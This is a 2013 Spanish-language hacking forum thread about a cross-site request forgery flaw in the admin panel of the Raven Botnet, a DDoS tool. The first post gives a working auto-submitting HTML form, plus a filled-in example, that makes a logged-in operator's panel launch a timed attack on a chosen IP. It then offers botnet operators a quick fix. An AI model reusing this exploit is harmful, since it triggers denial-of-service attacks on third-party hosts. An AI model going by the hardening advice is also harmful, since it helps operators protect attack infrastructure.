CSRF Raven Botnet

  • 2 Respuestas
  • 3357 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Metadato

  • *
  • Underc0der
  • Mensajes: 59
  • Actividad:
    0%
  • Reputación 0
  • C / C++ & ASM
    • Ver Perfil

CSRF Raven Botnet

  • en: Agosto 28, 2013, 01:55:33 pm
Bueno pues hola a todos, he encontrado varios CSRF en la Raven Botnet, uno de ellos está en la parte del ataque:

Código: (html5) You are not allowed to view links. Register or Login
<html>

<!-- CSRF Raven botnet, by Metadato -->

<body onload="document.csrf.submit();">
<form name="csrf" action="URL DONDE SE ENCUENTRA LA BOTNET/admin.php" method="post">
<input type="hidden" name="target" value="HOST / IP QUE QUEREMOS ATACAR">
<input type="hidden" name="time" value="TIEMPO EN SEGUNDOS">
<input type="hidden" name="start" value="Attack!">
</form>
</body>
</html>

Tendrían que editar todo lo que está en mayúscula, les mostraré el mismo código con un ejemplo:

Código: (html5) You are not allowed to view links. Register or Login
<html>

<!-- CSRF Raven botnet, by Metadato -->

<body onload="document.csrf.submit();">
<form name="csrf" action="http://ravenbotnet.com/admin.php" method="post">
<input type="hidden" name="target" value="173.194.34.248">
<input type="hidden" name="time" value="500">
<input type="hidden" name="start" value="Attack!">
</form>
</body>
</html>

Tambien podrían ocultar este script con un pequeño fake, pero como la intención de este post es que se fixeen los CSRF's, no se lo mostraré.
Bueno tambien voy a ser sincero, ¿cuantos de ustedes muestran la url donde esta su Raven Botnet? Creo que ninguno, quien lo haga no es muy recomendable, y más en este caso.

Bueno si quieren solucionar esto de forma rápida (aunque algo chapucera), puede cambiar el nombre de admin.php por otro nombre y en el index.php, en la línea 10:

Código: (php) You are not allowed to view links. Register or Login
echo '<META HTTP-EQUIV="Refresh" CONTENT="0; URL=admin.php">';

Le cambian el admin.php por el nombre que le pusieron y listo, también pueden montar la Raven de forma local. Espero que [Q]3rV[0] atienda este mensaje.

Un saludo  ;D
« Última modificación: Agosto 29, 2013, 07:04:38 am por Metadato »

Desconectado Réplica1

  • *
  • Underc0der
  • Mensajes: 35
  • Actividad:
    0%
  • Reputación 0
  • ... está historia se acabó.
    • Ver Perfil
    • @Pekador - Twitter

Re:CSRF Raven Botnet

  • en: Agosto 28, 2013, 02:33:37 pm
Muy buen csrf, y el detalle de reportarlo muchisimo mejor.

Saludos!


Desconectado Metadato

  • *
  • Underc0der
  • Mensajes: 59
  • Actividad:
    0%
  • Reputación 0
  • C / C++ & ASM
    • Ver Perfil

Re:CSRF Raven Botnet

  • en: Agosto 29, 2013, 11:12:07 am
You are not allowed to view links. Register or Login
Muy buen csrf, y el detalle de reportarlo muchisimo mejor.

Saludos!

Gracias Pekador, un saludo compa.
« Última modificación: Agosto 30, 2013, 10:32:44 am por Metadato »